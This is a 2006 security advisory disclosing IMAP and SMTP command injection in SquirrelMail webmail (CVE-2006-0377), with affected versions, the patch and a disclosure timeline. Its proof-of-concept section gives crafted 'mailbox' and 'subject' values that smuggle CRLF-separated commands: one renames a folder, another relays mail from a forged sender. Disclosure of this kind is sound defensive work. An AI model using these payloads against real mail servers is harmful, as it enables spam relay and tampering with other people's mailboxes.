============================================= INTERNET SECURITY AUDITORS ALERT 2006-002 - Original release date: February 27, 2006 - Last revised: February 27, 2006 - Discovered by: Vicente Aguilera Diaz - Severity: 3/5 ============================================= I. VULNERABILITY ------------------------- IMAP/SMTP Injection in SquirrelMail II. BACKGROUND ------------------------- SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation. The product homepage is http://www.squirrelmail.org. III. DESCRIPTION ------------------------- SquirrelMail provides a graphical interface to interact with mail servers across the IMAP and SMTP protocols. Improper command and information validation transmitted by SquirrelMail to the mail servers during the normal use of this application (mailbox management, e-mail reading and sending, etc.) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail across parameters used by the webmail front-ent in its communication with these mail servers. This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands. IV. PROOF OF CONCEPT ------------------------- == IMAP example (1.4.2 version) ============= SquirrelMail Vulnerable parameter: "mailbox" When a user clicks in the subject of an e-mail, he creates a GET request as: http:///src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0 A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command. The IMAP command injection has the following structure: http:///src/read_body.php?mailbox=INBOX%22%0D%0 %0D%0A %20SELECT%20%22INBOX&passed_id=&startMessage=1 Example: Injection of the RENAME IMAP command across the "mailbox" parameter: http:///src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1 == SMTP example (1.2.7 version) ============= SquirrelMail Vulnerable parameter: "subject" (and possibly others) When a user send a message, he create a POST request like: POST http:///src/compose.php HTTP/1.1 ... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept -----------------------------84060780712450133071594948441 ... A malicious user can modify the value of the "subject" parameter and inject any SMTP command. Example: Relay from a non-existent e-mail address ... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept%0d%0a.%0d%0a%0d%0amail from: hacker@domain.com%0d%0arcpt to: victim@otherdomain.com%0d%0adata%0d%0aThis is a proof of concept of the SMTP command injection in SquirrelMail%0d%0a.%0d%0a -----------------------------84060780712450133071594948441 ... V. BUSINESS IMPACT ------------------------- The IMAP/SMTP command injection allow relay, SPAM, exploit IMAP and SMTP vulnerabilities in the mail servers and evade all the restrictions at the application layer. VI. SYSTEMS AFFECTED ------------------------- IMAP Injection: All versions prior to 1.4.6. SMTP Injection: SquirrelMail 1.2.7 (and older versions). VII. SOLUTION ------------------------- Replace \r and \n from $mailbox in the function sqimap_mailbox_select. Patch available: http://www.squirrelmail.org/security/issue/2006-02-15 VIII. REFERENCES ------------------------- - http://www.squirrelmail.org/security/issue/2006-02-15 - CVE-2006-0377 IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com). X. REVISION HISTORY ------------------------- January 12, 2006: Initial release January 20, 2006: Disclosure timeline updated February 16, 2006: Disclosure timeline updated February 27, 2006: Disclosure timeline updated XI. DISCLOSURE TIMELINE ------------------------- December, 2005 Vulnerability acquired by Vicente Aguilera Diaz (Internet Security Auditors) January 12, 2006 Initial vendor notification sent. January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and 1.5.1 cvs. February 15, 2006 The vendor published the vulnerability in the security section. February 25, 2006 The CVE-2006-0377 is updated.